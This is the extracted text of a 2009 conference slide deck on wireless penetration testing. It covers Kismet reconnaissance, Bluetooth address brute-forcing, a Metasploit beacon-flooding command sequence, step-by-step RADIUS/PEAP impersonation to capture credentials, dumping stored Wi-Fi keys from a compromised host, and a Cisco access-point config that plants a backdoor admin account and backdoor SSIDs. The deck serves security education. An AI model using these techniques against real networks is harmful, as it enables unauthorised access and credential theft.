Wireless Weaponry. Tools, Tips and Techniques for Effective. Wireless Pen
Testing. Copyright 2009, All Rights Reserved. Joshua Wright
com ...
Wireless Weaponry
Tools, Tips and Techniques for Effective Wireless Pen Testing
Joshua Wright
[email protected] Copyright 2009, All Rights Reserved
Wireless Weaponry - ©2009, Joshua Wright
1
Your Speaker
Chef-Style TFH
• Joshua Wright • Senior Security Analyst, InGuardians • Senior SANS Instructor, Ethical Hacking Wireless course author •
[email protected] •
[email protected] Wireless Weaponry - ©2009, Joshua Wright
2
Introduction • General false sense of security with regard to wireless – "What, WPA doesn't solve all my problems?!?" (Answer: No, it doesn't)
• Not just WiFi; Bluetooth, ZigBee and proprietary protocols • Wireless Weaponry: Pragmatic tools and techniques for better pen tests Wireless Weaponry - ©2009, Joshua Wright
3
Outline • • • • •
Scanning and Reconnaissance Exploitation Post-Exploitation Wireless Use and Exploitation Evolution Conclusions and Q&A
Wireless Weaponry - ©2009, Joshua Wright
4
Kismet is a Staple Tool • Kismet Stable has many features that are often overlooked – Multiple simultaneous interfaces – CVS and XML data for post-processing analysis – Controlling channel hopping sequence for more effective coverage
• Kismet Newcore introduces performance, UI, and functionality improvements Wireless Weaponry - ©2009, Joshua Wright
5
Kismet for Pen Testers • One or more high-gain USB cards (ALFA) as primary interface
– One card for channel hopping – Second card for locking the channel hopper for interesting networks
• Atheros PC Card for b/g/a sniffing – Most activity is still on b/g
• Change channel sequence to hop to 1,6,11 more frequently (or 1,4,8,11 if deployed) Hacking Kismet Stable Channel Hopper – 5 channels == ~1 second defaultchannels=IEEE80211g:1,1,1,1,1,7,6,6,6,6,6,4,11,11,11,11,11,8,1,…
Wireless Weaponry - ©2009, Joshua Wright
6
Kismet Newcore • Not just 802.11 anymore – DECT scanning plugin – ZigBee/802.15.4 scanning in progress
• Not just passive anymore – Plugins actively manipulate the network (not default, but possible)
• Not just analysis anymore – Live PTW WEP cracking, for starters Wireless Weaponry - ©2009, Joshua Wright
7
Cisco Spectrum Expert
~$3000 Wireless Weaponry - ©2009, Joshua Wright
10
Bluetooth Enumeration • Many (all?) Bluetooth devices respond to *:*:AA:BB:CC:DD • Knowing last 3 bytes, can test 256 values to find the target • Optimized using BNAP, BNAP data # ruby bt-uap-search.rb 4 EC:47:86 Contacting 4A:57:00:EC:47:86 using Contacting 4A:57:01:EC:47:86 using Contacting 4A:57:02:EC:47:86 using Contacting 4A:57:03:EC:47:86 using Contacting 4A:57:25:EC:47:86 using Contacting 4A:57:26:EC:47:86 using
hci0 hci1 hci2 hci3
(1/256) (2/256) (3/256) (4/256)
hci1 (38/256) hci3 (39/256)
TARGET FOUND: 4A:57:25:EC:47:86 (hci1)
Wireless Weaponry - ©2009, Joshua Wright
11
Hey, What Happened to Pragmatism? Bluetooth serial adapter • Scanning for Bluetooth still takes a long time – Not practical or useful to find someone's iPhone (usually)
• Targeted attacks may be worthwhile – Credit card processing systems
Wireless Weaponry - ©2009, Joshua Wright
12
Wireless Weaponry - ©2009, Joshua Wright
13
Outline • • • • •
Scanning and Reconnaissance Exploitation Post-Exploitation Wireless Use and Exploitation Evolution Conclusions and Q&A
Wireless Weaponry - ©2009, Joshua Wright
14
Pragmatic Exploitation • Keep an eye out for the little things • Don't let an ad-hoc network pass you by – XP clients, printers common
• Watch guest networks for internal employees (NBNS broadcasts) – Often escaping web filtering – Target these clients directly as guest
• What networks are clients probing for? Wireless Weaponry - ©2009, Joshua Wright
15
Karmetasploit • Magic WiFi from Metasploit project
– "Hi, I'm the network you asked for, and every other network in the world. Here are a bunch of exploits, kthxbye."
• Becoming more difficult to leverage against Vista and XP SP3
– Clients wait to hear beacons from their preferred network before probing
• We can beacon too …
Wireless Weaponry - ©2009, Joshua Wright
16
Chaka Kahn Wait, what?
• Injects beacons using common SSID's
– Courtesy of the top-SSID list from wigle.net
• Causes clients to think their preferred networks are available, leading to probes
# ./msfconsole -r ssidlist.rc =[ + -- --=[ + -- --=[ =[
msf v3.3-dev 295 exploits - 124 payloads 17 encoders - 6 nops 60 aux
resource> use auxiliary/dos/wireless/ssidlist_beacon resource> set DRIVER madwifing DRIVER => madwifing resource> set INTERFACE wifi0 INTERFACE => wifi0 resource> set CHANNEL 1 CHANNEL => 1 resource> exploit [*] Sending beacon frames...
Wireless Weaponry - ©2009, Joshua Wright
17
Exploiting PEAP • Attacking RADIUS server TLS validation by client – Client typically validates cert, but does not enforce a given CN – Client often allowed to accept or reject a new certificate from RADIUS
• FreeRADIUS-WPE: Modified RADIUS server to exploit PEAP, others Wireless Weaponry - ©2009, Joshua Wright
18
RADIUS Impersonation 1. Attacker sniffs network, identifies CA in use 2. Attacker buys wireless cert from same CA for CN "evilhacker.net" 3. Attacker starts FreeRADIUS-WPE with AP using victim SSID 4. Attacker deauth's victim (or waits patiently for a roam operation) 5. Victim connects to attacker AP, gets RADIUS cert 6. Cert is trusted, but not previously observed. Victim is prompted to accept 7. Victim accepts, attacker obtains MS-CHAPv2 credentials, disappears.
2
$$ RADIUS Server
1 S Dea poofe d u th en t icat e 4
Corporate Network
WPA2+PEAP Access Point
3
5 Victim
6
WZC displays name, not CN Wireless Weaponry - ©2009, Joshua CA Wright
19
Outline • • • • •
Scanning and Reconnaissance Exploitation Post-Exploitation Wireless Use and Exploitation Evolution Conclusions and Q&A
Wireless Weaponry - ©2009, Joshua Wright
20
Long-Range WiFi Attacks
Wireless Weaponry - ©2009, Joshua Wright
21
Client Compromise • Concept: Leverage client compromise to attack internal wireless networks • Vista introduces all-new wireless stack • NDIS 6 requires wireless drivers to support monitor-mode packet capture
– Previously limited to Linux or commercial drivers
• Unfortunately, not exposed in any built-in applications • Tools: vistarfmon, nm2lp (InGuardians), NetMon (Microsoft) Wireless Weaponry - ©2009, Joshua Wright
22
Capturing Vista Wireless Traffic • With RFMON capture, we can use Vista host to discover and attack nets – It's like having a remote Linux box, sort of
• Packet capture supplied by Microsoft NetMon 3.3 – Silent command-line install and capture… no reboot
• Attacker can enumerate, analyze and attack wireless networks seen by victim • No attack tools read NetMon WLAN captures • Solution: nm2lp from InGuardians! Ettercap Kismet
Aircrack-ng
Atty coWP
Internet Compromised Vista Host
Corporate Access Point
Wireless Weaponry - ©2009, Joshua Wright
Corporate Wireless Client
23
Vista Wireless Power Tools C:\>vistarfmon vistarfmon: Enable and disable monitor mode on Vista NDIS 6 interfaces. Copyright (c) 2008 Joshua Wright Available interface(s): 1. Intel(R) Wireless WiFi Link 4965AGN, Mode: ExSta, State: connected C:\>vistarfmon 1 mon Operation mode set to Monitor. C:\>nmcap /Network "Wireless Network Connection" /Capture WiFi /File wlan.cap Netmon Command Line Capture (nmcap) 3.2.1303.0 Loading Parsers ... Saving info to: C:\\wlan.cap - using circular buffer of size 20.00 MB.
Victim System
C:\>nm2lp nm2lp: Convert NetMon 3.2 capture to libpcap format (version 1.0). Copyright (c) 2008 Joshua Wright Usage: nm2lp C:\>nm2lp wlan.cap wlan.dump
Pen Tester System
Wireless Weaponry - ©2009, Joshua Wright
24
Extracting Stored Wireless Keys • Dictionary attacks against PSK are mildly interesting – Distributed CUDA-acceleration is fun too
• Biggest issue is the distributed storage of keys and lack of frequent rotation • U3 Autorun fun and WirelessKeyView C:\>wirelesskeyview /stext wlankeys.txt C:\>type wlankeys.txt Network Name (SSID): somethingclever Key Type : WPA-PSK Key (Hex) : 66616d696c79206d6f766965206e6967687400 Key (Ascii) : family movie night
Wireless Weaponry - ©2009, Joshua Wright
25
Where is that AP/Controller?
Many AP's reveal their IP address in management frames or data frames for management traffic (Cisco Aironet in this example, 172.16.0.92)
Wireless Weaponry - ©2009, Joshua Wright
26
Attacking AP Management Interface • AP's themselves are useful targets
– Management interfaces exposed on guest networks – Compromised client access to device
• Weak passwords, weak protocols, RADIUS manipulation, cooking theft • Once you control the AP, we can have lots of fun on the network – Especially when the AP is on a .1q port Wireless Weaponry - ©2009, Joshua Wright
27
Ghost in the AP Attack username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm ! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods ! ssid KJOGuest vlan 156 guest-mode authentication open
Before
username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... username acoop privilege 15 secret "evilpass" aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm encryption vlan 1 ciphers aes-ccm encryption vlan 102 ciphers aes-ccm ! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods ! ssid KJOGuest vlan 156 guest-mode authentication open ! ! Backdoor network access SSID on mgmt VLAN ssid attackerBackdoorWlan wpa-psk ascii KevinReallyWearsGlasses vlan 1 no guest-mode ! ! Attacking any other accessible VLAN example ssid attackVlan102 wpa-psk ascii YouWontGuessThisWpaPsk vlan 102
Wireless Weaponry - ©2009, Joshua Wright
Eeek! 28
Outline • • • • •
Scanning and Reconnaissance Exploitation Post-Exploitation Wireless Use and Exploitation Evolution Conclusions and Q&A
Wireless Weaponry - ©2009, Joshua Wright
29
Complacent Wireless Security • My growing concern over wireless security – "Where there is a wireless, there is a way"
• Effective wireless pen testing is not possible in a 2-hour non-obstructive engagement
– And not a practical reflection of an actual attack
• Customer value-add with educated attack concessions
– "Let's talk about the resources of your adversary, and the time they could invest into cracking your WPA-PSK key. We can continue pen-test from there." Wireless Weaponry - ©2009, Joshua Wright
30
Wireless Adoption • Continued wireless adoption reaching new verticals – ZigBee and 802.15.4 growing in popularity for low-power needs (retail, manufacturing)
• Smart Grid wireless technology on every home – WiMAX, cellular or proprietary uplink – ZigBee in the home area network (HAN) Wireless penetration testing incorporates multiple protocols, techniques and skill sets Wireless Weaponry - ©2009, Joshua Wright
31
ZigBee Pen Testing • Current ZigBee lacks robust security
– "Residential" or "standard security" mode == plaintext key delivery OTA – No mutual authentication available
• ZigBee Pro (2007) stack improves security, at the cost of flash, memory, CPU – Will not be adopted by all vendors
• Distributed keys on all devices, hardware key extraction remains viable • New retail profile makes ZigBee a financially viable target for attackers (CC transmissions at stores) – But, you have to find the device first
Wireless Weaponry - ©2009, Joshua Wright
32
zbfind
"… due to the low-cost nature of ad hoc network devices, one cannot generally assume the availability of tamper resistant hardware. Hence, physical access to a device may yield access to secret keying material and other privileged information, as well as access to the security software and hardware." ZigBee Specification 053474r17, Jan. 2008 33
Wireless Weaponry - ©2009, Joshua Wright
Outline • • • • •
Scanning and Reconnaissance Exploitation Post-Exploitation Wireless Use and Exploitation Evolution Conclusions and Q&A
Wireless Weaponry - ©2009, Joshua Wright
34
Conclusion • Wireless pen testing has many angles – Not just attacker Æ AP Æ Pwned
• Pragmatic recon, exploit, post-exploit recommendations • Talk to your customer about the best use of your time (and their money) for an effective test • Don't get caught up in a single wireless technology – WiFi, Bluetooth, WiMAX, ZigBee, proprietary are all areas you should be targeting
• Help change your complacent customer's mind about the risks and threats of wireless Wireless Weaponry - ©2009, Joshua Wright
35
Q+A, Resources Joshua Wright Office/Mobile: 401-524-2911
[email protected] [email protected]
www.inguardians.com
www.willhackforsushi.com
SANS Ethical Hacking Wireless Course www.sans.org/training/description.php?mid=3 vistarfmon - www.inguardians.com/tools Kismet Stable - www.kismetwireless.net nm2lp - www.inguardians.com/tools Kismet Newcore - www.kismetwireless.net zbfind - Contact Josh WiFiFoFum - iPhone Store Cisco Spectrum Expert - www.cisco.com/en/US/products/ps9393 Chaka Kahn - www.willhackforsushi.com/code/ssidlist_beacon.rb FreeRADIUS-WPE - www.willhackforsushi.com/?page_id=37 NetMon 3.3 - connect.microsoft.com/site/sitehome.aspx?SiteID=216 wirelesskeyview - www.aspecto-software.com/rw/applications/wififofum
Wireless Weaponry - ©2009, Joshua Wright
36